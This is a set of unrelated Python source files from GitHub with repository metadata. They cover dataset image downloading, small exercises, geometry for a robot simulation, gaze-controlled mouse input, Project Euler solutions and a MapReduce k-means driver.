save_arr(out_save_location, segment_dataset[1])\n\n\ndef 
populate_segments(upper_bound, dataset_type, segment_type, segment):\n \"\"\"\n upper_bound (int): This is the last number in the longer list of images that is extracted by this func\n dataset_type: \"50-50, 70-30, 80-20, 90-10\" based on the current type that is being downloaded\n segment_type: \"train | test\" based on the dataset type\n segment: this is the sub segment of the list that is being operated on\n \"\"\"\n imgs = []\n outs = []\n\n for i in trange(len(segment), desc=f\"{dataset_type}: {segment_type} Segment from {upper_bound - 499} - {upper_bound}\"):\n img_arr = extract_img(segment.iloc[i][\"img_link\"])\n\n if img_arr is not None:\n imgs.append(img_arr)\n outs.append(np.eye(2)[segment.iloc[i][\"is_explicit\"]])\n \n segment_dataset = (np.array(imgs), np.array(outs))\n save_segment(upper_bound, dataset_type, segment_type, segment_dataset)\n\n return f\"{upper_bound - 499} - {upper_bound} completed\"\n\n\ndef download_images(dataset_split_type, data_csv, dataset_type):\n # Download training images\n thread_pool = []\n with cf.ThreadPoolExecutor() as download_executor:\n # train set\n i = 0\n while i + 500 <= len(data_csv):\n i += 500 # create the upperbound\n\n executor = download_executor.submit(\n populate_segments, # function\n i - 1, # upperbound\n dataset_split_type, # dataset split type\n dataset_type, # type of the dataset being created\n data_csv.iloc[(i -500): i], # segmenting to the section being worked on\n )\n\n thread_pool.append(executor)\n \n # download the final segment that may not be in reach by the upper while loop\n if (len(data_csv) % 500) > 0:\n i += 500\n executor = download_executor.submit(\n populate_segments, # function\n i - 1, # upperbound\n dataset_split_type, # dataset split type\n dataset_type, # type of the dataset being created\n data_csv.iloc[(i -500): len(data_csv)], # segmenting to the section being worked on\n )\n\n thread_pool.append(executor)\n\n for executor in cf.as_completed(thread_pool):\n try:\n if executor.exception():\n print(executor.exception())\n except:\n pass\n\n\ndef assemble_dataset(dataset_split_type, train_csv_len, test_csv_len, train_assembled, test_assembled):\n assembly_folder = f\"data/processed-data/{dataset_split_type}\"\n \n def assemble(dataset_type, data_type, dataset_len):\n \"\"\"\n This is is a helper function to assemble the data based on\n dataset_type: this is either train or test data\n data_type: this is either img data or out (expected output) data\n dataset_len: this is the lenght of the combined csv that contained the urls\n \"\"\"\n floored_upper = int(dataset_len / 500) * 500 # get all the expected segment numbers\n upper = 0\n if floored_upper < dataset_len:\n upper = floored_upper + 500\n else:\n upper = floored_upper\n \n combined_dataset = [] # will contain all the np arrays combined\n segment_files = [] # append all the segment files here\n\n i = 0 # monitoring counter\n while i + 500 <= upper: # fetch all the files part of the segmenting\n i += 500\n segment_files.append(f\"{dataset_type}-{i - 1}-{data_type}.npy\")\n \n # assemble\n for segment_file in segment_files:\n with open(f\"{assembly_folder}/{segment_file}\", \"rb\") as opened_file:\n np_data = np.load(opened_file)\n combined_dataset.extend(np_data[:]) # get all as an array\n \n with open(f\"{assembly_folder}/{dataset_type}-{data_type}.npy\", \"wb\") as target_file:\n np.save(target_file, np.array(combined_dataset))\n\n print(\"Purging segment files...\")\n for segment_file in tqdm(segment_files):\n try:\n 
os.remove(f\"{assembly_folder}/{segment_file}\")\n except:\n pass\n \n executor_thread_pool = []\n \n # train dataset\n with cf.ThreadPoolExecutor() as export_executor:\n if not train_assembled:\n print(f\"Assembling {dataset_split_type} train dataset\")\n executor_thread_pool.append(export_executor.submit(assemble, \"train\", \"img\", train_csv_len))\n executor_thread_pool.append(export_executor.submit(assemble,\"train\", \"out\", train_csv_len))\n\n if not test_assembled:\n print(f\"Assembling {dataset_split_type} test dataset\")\n executor_thread_pool.append(export_executor.submit(assemble, \"test\", \"img\", test_csv_len))\n executor_thread_pool.append(export_executor.submit(assemble, \"test\", \"out\", test_csv_len))\n \n # wait for completion and get all the exceptions if there exists any\n for executor_thread in cf.as_completed(executor_thread_pool):\n try:\n if executor_thread.exception():\n print(executor_thread.exception())\n except:\n pass\n\n\ndef attempt_recovery(dataset_split_type, dataset_type):\n \"\"\" Triggers recovery protocol to prevent image redownload\n\n Triggers recovery protocol to find the progress achieved by the previous download session.\n Top prevent redownload of already downloaded images. Scans through looking for upperbounds\n that have been acheived.\n\n Once the iundownloaded segments are found, redownload commences for only those segments\n\n Args:\n dataset_split_type: specifies which folder to look into based on how the dataset is split\n \"\"\"\n dataset_folder = f\"data/processed-data/{dataset_split_type}\"\n dataset_csv = pd.read_csv(f\"{dataset_folder}/{dataset_type}.csv\")\n dataset_len = len(dataset_csv)\n # scan for remaining segments to download\n folder_children = os.scandir(dataset_folder)\n relevant_files = [] # will store the files that are of that category\n\n for child in folder_children:\n if re.search(f\"{dataset_type}-\\d+-img\\.npy\", child.name):\n relevant_files.append(child.name)\n \n floored_upper = int(dataset_len / 500) * 500 # get all the expected segment numbers\n upper = 0\n if floored_upper < dataset_len:\n upper = floored_upper + 500\n else:\n upper = floored_upper\n \n remaining_bounds = [] # stash the remaining bound after searching through\n\n i = 0 # monitor bounds\n while i + 500 <= upper:\n i += 500\n segment_file = f\"{dataset_type}-{i - 1}-img.npy\"\n try:\n relevant_files.index(segment_file)\n except:\n remaining_bounds.append(i - 1)\n \n thread_pool = []\n \n with cf.ThreadPoolExecutor() as recovery_executor:\n for bound in remaining_bounds:\n if bound + 1 <= dataset_len:\n populate_future = recovery_executor.submit(\n populate_segments,\n bound,\n dataset_split_type,\n dataset_type,\n dataset_csv.iloc[bound - 499: (bound + 1)], # segment data by boundng hundreds\n )\n thread_pool.append(populate_future)\n else:\n populate_future = recovery_executor.submit(\n populate_segments,\n bound,\n dataset_split_type,\n dataset_type,\n dataset_csv.iloc[bound - 499: dataset_len], # segment data by boundng hundreds\n )\n thread_pool.append(populate_future)\n\n for future_populate_segment in cf.as_completed(thread_pool):\n try:\n result = future_populate_segment.result()\n print(result)\n except Exception as exc:\n print(future_populate_segment.exception())\n \n\n\ndef is_salvagable(dataset_split_type, dataset_type):\n \"\"\" Checks for salvagability of folder before forcing fresh download\n\n This includes looking for already downloaded segment files in the respetive folder\n This looks for folders with the segment file 
structure e.g.\n For training data, the segment would be `train-99-img.npy`\n \n Args:\n dataset_split_type: \"50-50\" | \"70-30\" | \"80-20\" | \"909-10\"\n dataset_type: whether it is `\"train\"` or `\"test\"` data\n \n Returns:\n bool: representing whether or not a segmented dataset was found\n \"\"\"\n downloaded_segment_found = False\n dataset_folder = f\"data/processed-data/{dataset_split_type}\"\n\n # scan for remaining any previously downloaded segments\n folder_children = os.scandir(dataset_folder)\n\n # looking for the first file that fits the criteria. if any file is found that fits\n # the below regular expression, we break out of the loop and attempt recovery\n for child in folder_children:\n if re.search(f\"{dataset_type}-\\d+-img\\.npy\", child.name):\n downloaded_segment_found = True\n break\n \n return downloaded_segment_found\n\n\ndef is_complete(dataset_split_type, dataset_type):\n \"\"\" Checks whether the files have already been downloaded and assembled\n \"\"\"\n complete = False # flag returned after scanning directory\n target_folder = f\"data/processed-data/{dataset_split_type}\"\n # scan for folder children\n folder_children = [child.name for child in os.scandir(target_folder)]\n try:\n folder_children.index(f\"{dataset_type}-img.npy\")\n complete = True # getting to this point means that the ndex was found\n except: # value not found\n pass\n \n return complete\n\n\nif __name__ == \"__main__\":\n datasets = [\"50-50\", \"70-30\", \"80-20\", \"90-10\"]\n\n for dataset_split_type in datasets:\n train_csv = pd.read_csv(f\"data/processed-data/{dataset_split_type}/train.csv\")\n test_csv = pd.read_csv(f\"data/processed-data/{dataset_split_type}/test.csv\")\n\n # check for salvagability before committing to a fresh download for both train and test\n train_assembled = is_complete(dataset_split_type, \"train\")\n test_assembled = is_complete(dataset_split_type, \"test\")\n\n if train_assembled:\n print(f\"{dataset_split_type} train dataset already downloaded\")\n elif is_salvagable(dataset_split_type, \"train\"):\n print(f\"Attempting Recovery for training data in {dataset_split_type}...\")\n attempt_recovery(dataset_split_type, \"train\")\n print(f\"Train Dataset with split: {dataset_split_type} download complete\")\n else:\n download_images(dataset_split_type, train_csv, \"train\")\n print(f\"Train Dataset with split: {dataset_split_type} download complete\")\n\n if test_assembled:\n print(f\"{dataset_split_type} test dataset already downloaded\")\n elif is_salvagable(dataset_split_type, \"test\"):\n print(f\"Attempting Recovery for training data in {dataset_split_type}...\")\n attempt_recovery(dataset_split_type, \"test\")\n print(f\"Test Dataset with split: {dataset_split_type} download complete\")\n else:\n download_images(dataset_split_type, test_csv, \"test\")\n print(f\"Test Dataset with split: {dataset_split_type} download complete\")\n\n assemble_dataset(dataset_split_type, len(train_csv), len(test_csv), train_assembled, test_assembled)\n","repo_name":"sloppie/media-wellbeing","sub_path":"pre-processing/save_images.py","file_name":"save_images.py","file_ext":"py","file_size_in_byte":15316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"16564805927","text":"\"\"\" Units of Time\r\n Create a program that reads duration from the user as a number of days, hours, minutes, and seconds.\r\n Compute and display the total number of seconds represented by this 
duration.\"\"\"\r\n\r\nsecpermin=60\r\nsecperhour=3600\r\nsecperday=86400\r\ndays=int(input(\"Enter the number of Days: \"))\r\nhours=int(input(\"Enter the number of Hours: \"))\r\nminutes=int(input(\"Enter the number of Minutes: \"))\r\nseconds=int(input(\"Enter the number of Seconds: \"))\r\ntotalseconds=days*secperday+(hours*secperhour)+(minutes*secpermin)+seconds\r\nprint(\"Total number of seconds = \",\"%d\"%(totalseconds))","repo_name":"LOKESH538/Python","sub_path":"Assignment-2/InSeconds.py","file_name":"InSeconds.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18717238836","text":"titulo = \"Proporciona los siguientes datos del libro:\"\nnombre = input(\"Introduzca nombre del libro: \")\nid = int(input(\"Introduzca ID del libro: \"))\nprecio = float(input(\"Introduzca precio del libro: \"))\nenvio = input(\"Indica si el envio es gratiuito (True/False)\")\n\nif envio == 'True':\n envio = True\nelif envio == 'False':\n envio = False\nelse:\n envio = \"Valor incorrecto debe introducir True/False\"\n\n# print(f\"Nombre: {nombre}\\nID: {id}\\nPrecio: {precio}\\nEnvio Gratuito?: {envio}\")\n# F String puedes poner texto preformateado\nprint(f'''\nNombre: {nombre}\nID: {id}\nPrecio: {precio}\nEnvio Gratuito?: {envio}\n''')\n\n","repo_name":"TheHardest18/python_exercises","sub_path":"Leccion02/EjerTiendaLibros.py","file_name":"EjerTiendaLibros.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"1798572616","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport math\r\n\r\n\r\n\r\ndef drawBat(cX, cY, cXdash , cYdash ):\r\n plt.plot([cX,cXdash],[cY,cYdash])\r\n plt.show()\r\n\r\ndef calcVector(Current):\r\n vecCurrent = np.array([(Current[0, 0] - Current[1, 0]), (Current[0, 1] - Current[1, 1])])\r\n return vecCurrent\r\n\r\ndef calcVector(Topoint , Frompoint):\r\n Vector = np.array([(Topoint[0] - Frompoint[0]), (Topoint[1] - Frompoint[1])])\r\n return Vector\r\n\r\ndef calcAngle(m1 , m2):\r\n tanOfang = abs(((m2-m1)/(1+(m2*m1))))\r\n ang = math.degrees(math.atan(tanOfang))\r\n return ang\r\n\r\n\r\n\r\ndef calcShortestPoint( Robot , Obstacle):\r\n if ((Obstacle[0,1]-Obstacle[1,1]) != 0 and (Obstacle[0,0]-Obstacle[1,0]) != 0):\r\n\r\n m = ((Obstacle[0,1]-Obstacle[1,1])/(Obstacle[0,0]-Obstacle[1,0]))\r\n\r\n c1 = (-m*Obstacle[1,0]) + Obstacle[1,1]\r\n c2 = (1/m)*Robot[0] + Robot[1]\r\n\r\n\r\n ShPointX = ((c2- c1)*m)/(pow(m,2)+1)\r\n\r\n ShPointY = (((c1- c2))/(pow(m,2)+1)) + c2\r\n else:\r\n if((Obstacle[0,0]-Obstacle[1,0]) == 0):\r\n ShPointX = Obstacle[0,0]\r\n ShPointY = Robot[1]\r\n\r\n if ((Obstacle[0,1]-Obstacle[1,1])== 0):\r\n ShPointX = Robot[0]\r\n ShPointY = Obstacle[0,1]\r\n\r\n print(\"sh\",ShPointX,ShPointY)\r\n\r\n vectorObstacle=[Obstacle[0,0]-Obstacle[1,0] , Obstacle[0,1]-Obstacle[1,1]]\r\n vectorSh = [ShPointX-Obstacle[1,0] , ShPointY -Obstacle[1,1]]\r\n dotvecObs = np.dot(vectorObstacle,vectorObstacle)\r\n dotvecSh = np.dot(vectorObstacle,vectorSh)\r\n if (dotvecObs <= dotvecSh):\r\n shortestPt =[Obstacle[0,0],Obstacle[0,1]]\r\n else:\r\n if (dotvecSh <= 0):\r\n shortestPt = [Obstacle[1,0] , Obstacle[1,1]]\r\n else:\r\n shortestPt = [ShPointX , ShPointY]\r\n\r\n return shortestPt\r\n\r\nRobot = np.array([3,3])\r\nObs = np.array([[-40,1],[-40,200]])\r\nprint(calcShortestPoint(Robot,Obs)) # for checking\r\n\r\ndef rotateRobot(CurrentPath , theta):\r\n 
#Rotation of the robot about center\r\n Center=[CurrentPath[:,0].mean(),CurrentPath[:,1].mean()]\r\n #translation\r\n transCurrentfront = CurrentPath[0,:] - Center\r\n transCurrentback = CurrentPath[1, :] - Center\r\n #rotation\r\n theta = math.radians(theta)\r\n Rotmat = np.array([[math.cos(theta),- math.sin(theta)],[math.sin(theta),math.cos(theta)]])\r\n RotCurrentfront = np.matmul(Rotmat, transCurrentfront)\r\n RotCurrentback = np.matmul(Rotmat,transCurrentback)\r\n Advfront = RotCurrentfront + Center\r\n Advback = RotCurrentback + Center\r\n Rotpos = np.array([Advfront, Advback])\r\n return Rotpos\r\n\r\n\r\n\r\ndef pointAtDistance(dist , Current ):\r\n\r\n vecCurrent = [(Current[0, 0] - Current[1, 0]), (Current[0, 1] - Current[1, 1])]\r\n magCurrent = math.sqrt(math.pow(vecCurrent[0],2)+ math.pow(vecCurrent[1],2))\r\n unitvecCurrent = np.divide(vecCurrent,magCurrent)\r\n\r\n\r\n if ((Current[0, 0] - Current[1, 0]) != 0):\r\n m = ((Current[0, 1] - Current[1, 1]) / (Current[0, 0] - Current[1, 0]))\r\n x3 = math.sqrt((pow(dist,2))/(pow(m,2)+1)) + Current[1, 0]\r\n x32 = - math.sqrt((pow(dist,2))/(pow(m,2)+1)) + Current[1, 0]\r\n y3 = m*(x3 - Current[1, 0])+ Current[1, 1]\r\n y32 = m * (x32 - Current[1, 0]) + Current[1, 1]\r\n\r\n x3dash = math.sqrt((pow(dist, 2)) / (pow(m, 2) + 1)) + Current[0, 0]\r\n x32dash = - math.sqrt((pow(dist, 2)) / (pow(m, 2) + 1)) + Current[0, 0]\r\n y3dash = m * (x3dash - Current[1, 0]) + Current[1, 1]\r\n y32dash = m * (x32dash - Current[1, 0]) + Current[1, 1]\r\n\r\n else:\r\n x3 = Current[1, 0]\r\n y3 = Current[1, 1] + dist\r\n x3dash = Current[0,0]\r\n y3dash = Current[0,1] + dist\r\n\r\n x32 = Current[1, 0]\r\n y32 = Current[1, 1] - dist\r\n x32dash = Current[0, 0]\r\n y32dash = Current[0, 1] - dist\r\n\r\n vecfront = [(x3 - Current[1, 0]), (y3- Current[1, 1])]\r\n magfront = math.sqrt(math.pow(vecfront[0], 2) + math.pow(vecfront[1], 2))\r\n unitvecfront = np.divide(vecfront, magfront)\r\n vecfront2 = [(x32 - Current[1, 0]), (y32 - Current[1, 1])]\r\n magfront2 = math.sqrt(math.pow(vecfront2[0], 2) + math.pow(vecfront2[1], 2))\r\n unitvecfront2 = np.divide(vecfront2, magfront2)\r\n #print(\" unit vec cur\", unitvecCurrent , \" unit vec fr\" , unitvecfront, \" \", unitvecfront2)\r\n #print(\" all check \" , unitvecfront2 == unitvecCurrent , \" check \" , np.equal(unitvecfront2,unitvecCurrent) , \" diff \" , np.all(abs(unitvecfront2 - unitvecCurrent ) < 0.00001) )\r\n if(np.all(abs(unitvecfront - unitvecCurrent ) < 0.00001)):\r\n print(\"1\")\r\n Futpos = np.array([[x3dash,y3dash],[x3,y3]])\r\n\r\n if(np.all(abs(unitvecfront2 - unitvecCurrent ) < 0.00001)):\r\n print(\"2\")\r\n Futpos = np.array([[x32dash, y32dash], [x32, y32]])\r\n\r\n return Futpos\r\n\r\n# Robot = np.array([10,10])\r\n# Obs = np.array([[0,2],[5,7]])\r\n# dist = 10\r\n# print(pointAtDistance(dist,Obs))\r\n\r\ndef generateEcho(rdist,gbat,angle):\r\n af = 1\r\n Csei =0\r\n si =0\r\n Dsei = 0\r\n gi = gbat + 40*math.log((0.1/rdist),10) + 2*(rdist-0.1)*af + Dsei + si + Csei\r\n return gi\r\n\r\ndef defineVelocity(rdist):\r\n\r\n if (0.3 < rdist < 6):\r\n Velocity = rdist\r\n else:\r\n if(rdist >= 6 ):\r\n Velocity = 6\r\n else:\r\n Velocity = 0.3\r\n\r\n Angvelo = (6-Velocity)*100\r\n\r\n return Velocity,Angvelo\r\n\r\ndef calcDistance(point1 , point2):\r\n dist = math.sqrt((math.pow((point1[0]-point2[0]),2)+math.pow((point1[1]-point2[1]),2)))\r\n return dist\r\n\r\ndef controllerRobot(Robot,Obstacle):\r\n RobotLeft = Robot[0]\r\n RobotRight = Robot[1]\r\n RobotCenter = 
(Robot[0]+Robot[1])/2\r\n Rleft = calcShortestPoint(RobotLeft[0],Obstacle)\r\n print(\"points\", Rleft , \" \", RobotLeft[0])\r\n RLdist = calcDistance(Rleft,RobotLeft[0])\r\n Rright = calcShortestPoint(RobotRight[0], Obstacle)\r\n RRdist = calcDistance(Rright, RobotRight[0])\r\n Rcen = calcShortestPoint(RobotCenter[0],Obstacle)\r\n Rdist = calcDistance(Rcen, RobotCenter[0])\r\n if((RobotCenter[0,0]-RobotCenter[0,1])==0):\r\n SlopeRobot = math.inf\r\n else:\r\n SlopeRobot = (RobotCenter[0,1] - RobotCenter[1,1])/(RobotCenter[0,0]-RobotCenter[0,1])\r\n if ((Obstacle[0,0]-Obstacle[0,1]) == 0):\r\n SlopeObstacle= math.inf\r\n else:\r\n SlopeObstacle = (Obstacle[0,1] - Obstacle[1,1])/(Obstacle[0,0]-Obstacle[0,1])\r\n\r\n sei = calcAngle(SlopeRobot,SlopeObstacle)\r\n print(\" angle\", sei)\r\n gl = generateEcho(RLdist,120,sei)\r\n gr = generateEcho(RRdist,120,sei)\r\n print( \"echo \", gl ,gr )\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n RobotLeft = np.array([[1,1],[10,10]])\r\n RobotRight = np.array([[1,-1],[10,8]])\r\n Robot = np.array([RobotLeft , RobotRight])\r\n Obstacle_Hor = np.array([[-40,0],[-40,200]])\r\n controllerRobot(Robot,Obstacle_Hor)\r\n plt.plot(Obstacle_Hor[:,0],Obstacle_Hor[:,1])\r\n plt.plot(RobotLeft[:,0],RobotLeft[:,1])\r\n plt.plot(RobotRight[:, 0], RobotRight[:, 1])\r\n plt.show()\r\n","repo_name":"AdithyaVenkateshMohan/Bio-inspired-Bats-Autonomous-Car-algorithm-simulation","sub_path":"version1.2.py","file_name":"version1.2.py","file_ext":"py","file_size_in_byte":6960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"8270414111","text":"total_num_actions=3\nimagecount=0\nlook_around_X_data=[]\nlook_around_Y_data = []\nvalue_for_y=0.\nn_steps=32\ndata_path='./SyntheticDataV1'\nlabel_track_dict={}\nglobal mainx,mainy\nmainx=[]\nmainy=[]\n\n \n\nfor folders in os.listdir(data_path):\n\t\tfor actions,sub_folders in enumerate(os.listdir(data_path+'/'+folders)):\n\t\t\tfor real_actions in os.listdir(data_path+'/'+folders+'/'+sub_folders):\n\t\t\t\tframe_provider = VideoReader(data_path+'/'+folders+'/'+sub_folders+'/'+real_actions)\n\t\t\t\trun_demo(net, frame_provider, 256, cpu, 1, 1,actions-1)\n\t\t\n\n\ndef duplicate_creation(look_around_X_data,n_steps):\n\t\tmod_val=len(look_around_X_data) % n_steps\n\t\tduplicate_count=abs(int((((len(look_around_X_data)-mod_val)/ n_steps)+ 1)*n_steps-len(look_around_X_data)))\n\t\ttobeadded_X=look_around_X_data[len(look_around_X_data)-1]\n\t\ttobeadded_Y=look_around_Y_data[len(look_around_Y_data)-1]\n\t\tprint(\"Adding last record Duplicates. 
Total number is: \",duplicate_count)\n\t\tfor nums in range(0,duplicate_count):\n\t\t\tlook_around_X_data.append(tobeadded_X)\n\t\t\tlook_around_Y_data.append(tobeadded_Y)\n\n\n\t\n\ndef data_for_model(look_around_X_data,n_steps,look_around_Y_data):\n\n\tdef most_frequent(List): \n\t\tcounter = 0\n\t\tnum = List[0] \n\t\tfor i in List: \n\t\t\tcurr_frequency = List.count(i) \n\t\t\tif(curr_frequency> counter): \n\t\t\t\tcounter = curr_frequency \n\t\t\t\tnum = i \n\t\treturn num \n\twith open('Xdata.txt', 'w') as outfile:\n\t\tjson.dump(look_around_X_data, outfile)\n\n\tX_ = np.array(look_around_X_data)\n\tblocks = int(len(X_) / n_steps)\n\n\tX_ = np.array(np.split(X_,blocks))\n\t\n\tDivided_Y=[]\n\tj=[]\n # for elements in look_around_Y_data:\n # if(elements[0]==0.0):\n # j.append([1,0,0])\n # elif(elements[0]==1.0):\n # j.append([0,1,0])\n # elif(elements[0]==2.0):\n\t\t\t#j.append([0,0,1])\n\t\t\n\t \n\tfor elements in look_around_Y_data:\n\t\tif(elements[0]==0.0):\n\t\t\tj.append([1,0])\n\t\telif(elements[0]==1.0):\n\t\t\tj.append([0,1])\n\t # elif(elements[0]==2.0):\n\t# j.append([0,0,1])\n\t # elif(elements[0]==3.0):\n\t # j.append([0,0,0,1,0])\n\t # elif(elements[0]==4.0):\n\t # j.append([0,0,0,0,1])\n\tfor i in range(0,len(j),n_steps):\n\t\tDivided_Y.append(j[i:i+n_steps])\n\tfinal_y=[]\n\tfor i in range(0,len(Divided_Y)):\n\t\tfinal_y.append(most_frequent(Divided_Y[i]))\n\twith open('Ydata.txt', 'w') as outfile:\n\t\tjson.dump(j, outfile)\n\ty_= np.array(final_y)\n\n\treturn X_,y_\n\n\n\n\n\nif(len(look_around_X_data)%n_steps!=0):\n\tduplicate_creation(look_around_X_data,n_steps)\n\n\n\n\nnpX_,npy_=data_for_model(look_around_X_data,n_steps,look_around_Y_data)\n\nprint(\"Shapes: npx: \",npX_.shape,\" npy: \",npy_.shape,\"\\n\\n\\nnpy: \",npy_)\nf = Figlet(font='slant') \nprint (f.renderText(\"MODEL STARTS FROM HERE\"))\nprint(\"\\n\\nYtest: \",npy_,'\\n\\n')\n\n\n\n\nX_train, X_test, y_train, y_test = train_test_split(npX_, npy_, test_size=0.4, random_state=5)\n\nprint(\"(X_train shape, y_train shape, X_test shape ,y_test shape)\")\nprint(X_train.shape, y_train.shape, X_test.shape, y_test.shape)","repo_name":"adityacbhat/PatientMonitoringSystem","sub_path":"dataCreation.py","file_name":"dataCreation.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12899417221","text":"import cv2\nimport numpy as np\nfrom gaze_tracking import GazeTracking\nfrom utils import MouseAction, ReadWebcam, ReadVideo, annotate\n\n\nclass EyeControl:\n \"\"\"\n Control the mouse with eyes\n \"\"\"\n def __init__(self, source: str = \"\") -> None:\n self.gaze = GazeTracking()\n self.mouse = MouseAction()\n self.streams = ReadVideo(source) if source != \"0\" else ReadWebcam()\n\n def start(self):\n for frame, fshape in self.streams:\n frame, LP, RP, text = self.gaze_meta(frame)\n x, y = self.mouse.eye_position(LP, RP)\n self.mouse.mouse_action(fshape[:2], [x, y])\n\n frame = annotate(frame, text, LP, RP)\n cv2.imshow(\"Demo\", frame)\n if cv2.waitKey(1) == 27:\n cv2.destroyAllWindows()\n break\n\n def gaze_meta(self, frame: np.array):\n gaze = self.gaze\n gaze.refresh(frame)\n frame = gaze.annotated_frame()\n LP = gaze.pupil_left_coords()\n RP = gaze.pupil_right_coords()\n text = \"\"\n if gaze.is_blinking():\n text = \"Blinking\"\n elif gaze.is_right():\n text = \"Looking right\"\n elif gaze.is_left():\n text = \"Looking left\"\n elif gaze.is_center():\n text = \"Looking center\"\n return frame, LP, RP, 
text\n\n\nif __name__ == \"__main__\":\n source = \"videoplayback.mp4\"\n ec = EyeControl(source)\n ec.start()\n","repo_name":"1chimaruGin/EyeControl","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"44"} +{"seq_id":"22015913389","text":"#Problem85\n\n\"\"\"\nIn looking at a grid of length = n and width = 1, we see that the potential\nfor any sized rectangle (x,y) is 1<=x<=n is n-x rectangles. Thus, if we look\nat a 5x1 grid, there are\n - 5 possible 1x1 rectangles\n - 4 possible 2x1 rectangles\n - 3 possible 3x1 rectangles => 5+4+3+2+1 = 5*(5+1)/2\n - 2 possible 4x1 rectangles = 5th triangular number\n - 1 possible 5x1 rectangle\n\nIf we look at a grid of legnth = n and width = m != 1, we can see by the same\nprinciple that if there are n*(n+1)/2 possible rectangles in each row,\nthen there are\n - m * n*(n+1)/2 rectangles (width = 1)\n - (m-1) * n*(n+1)/2 rectangles (width = 2)\n - (m-2) * n*(n+1)/2 rectangles (width = 3)\n - . . . \n - 2 * n*(n+1)/2 rectangles (width = m-1)\n - 1 * n*(n+1)/2 rectangles (width = m)\n\n=> (m + m-1 + m-2 + ... + 2 + 1) * n*(n+1)/2 = (m*(m+1)/2)*(n*(n+1)/2)\n=> = (m*(m+1)*n*(n+1)/4)\n\"\"\"\nimport time\n\ndef space_determination(length, l):\n return length+1-l\n\ndef rectangle_counter(length, width):\n \"\"\"This function goes the long way, where it adds n+n-1+...+1 and multiplies\n this value by m+m-1+..+1\"\"\"\n count = 0\n l, w = 1, 1\n for i in range(w, width+1):\n for j in range(l, length+1):\n count += space_determination(length, j) * space_determination(width, i)\n return count\n\ndef rectangle_counter_triangular(length, width):\n \"\"\"Uses the triangular number principle shown above instead of computing\n the potential rectangles for each sized row\"\"\"\n return (length*(length+1)*width*(width+1))/4\n\ndef main():\n #Determine which grid is the closest to 2 million\n\n start = time.clock()\n difference = 2000000\n location = [1, 1]\n for i in range(1, 100):\n for j in range(1, 100):\n if abs(2000000 - rectangle_counter_triangular(i, j)) < difference:\n difference = abs(2000000 - rectangle_counter(i, j))\n location = [i, j]\n #print(difference, i, j, sep = '\\t')\n t = time.clock() - start\n\n print(\"Final value:\", difference, \"at\", location)\n print(location[0]*location[1])\n print(t, \"seconds\")\n \n\n\n \n\nif __name__ == '__main__':\n main()\n","repo_name":"KevinGoldberg/ProjectEulerScripts","sub_path":"Problem85.py","file_name":"Problem85.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"70907813893","text":"# 프로그래머스 카펫\n# https://programmers.co.kr/learn/courses/30/lessons/42842\n\n\ndef solution(brown, red):\n for i in range(1, red+1):\n total = brown + red\n m, r = divmod(red, i)\n if r != 0:\n continue\n\n m = m+2\n i = i+2\n if m * i == total:\n return [m, i]\n","repo_name":"devjinius/algorithm","sub_path":"Programmers/carpet.py","file_name":"carpet.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"24699201834","text":"#!/usr/bin/env python3\n\"\"\"\n.. 
module:: MRKmeans\n\nMRKmeans\n*************\n\n:Description: MRKmeans\n\n Iterates the MRKmeansStep script\n\n:Authors: bejar\n\n\n:Version:\n\n:Created on: 17/07/2017 10:16\n\n\"\"\"\n\nimport argparse\nimport pathlib\nimport shutil\nimport time\nfrom multiprocessing import cpu_count\nfrom typing import Dict, List\n\nfrom MRKmeansStep import Assignment, Key, MRKmeansStep, Prototype\n\n__author__ = \"bejar\"\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--prot\", default=\"prototypes.txt\", help=\"Initial prototpes file\"\n )\n parser.add_argument(\"--output\", default=\".\", help=\"Output directory\")\n parser.add_argument(\"--docs\", default=\"documents.txt\", help=\"Documents data\")\n parser.add_argument(\"--iter\", default=5, type=int, help=\"Number of iterations\")\n parser.add_argument(\n \"-n\",\n \"--ncores\",\n \"--nproc\",\n default=min(1, cpu_count() - 2),\n type=int,\n help=\"Number of parallel processes to use\",\n )\n\n args = parser.parse_args()\n assign: Dict[Key, Assignment] = {}\n\n assign_values: List[Assignment] = []\n\n # Copies the initial prototypes\n outdir = pathlib.Path(args.output)\n outdir.mkdir(parents=True, exist_ok=True)\n\n shutil.copy(args.prot, outdir.joinpath(\"prototypes0.txt\"))\n\n moved = False # Stores if there has been changes in the current iteration\n for i in range(args.iter):\n tinit = time.time() # For timing the iterations\n\n # Configures the script\n print(\"Iteration %d ...\" % (i + 1))\n # The --file flag tells to MRjob to copy the file to HADOOP\n # The --prot flag tells to MRKmeansStep where to load the prototypes from\n mr_job1 = MRKmeansStep(\n args=[\n \"-r\",\n \"local\",\n args.docs,\n \"--file\",\n str(outdir.joinpath(\"prototypes%d.txt\" % i)),\n \"--prot\",\n str(outdir.joinpath(\"prototypes%d.txt\" % i)),\n \"--num-cores\",\n str(args.ncores),\n ]\n )\n\n # Runs the script\n with mr_job1.make_runner() as runner1:\n runner1.run()\n\n new_assign: Dict[Key, Assignment] = {}\n new_proto: Dict[Key, Prototype] = {}\n # Process the results of the script iterating the (key,value) pairs\n for key, value in mr_job1.parse_output(runner1.cat_output()):\n new_assign[key], new_proto[key] = value\n\n # Check if there has been changes in the assignment\n #\n # We cannot use the following, because the names of the\n # clusters may have swapped:\n # moved = new_assign != assign\n #\n # 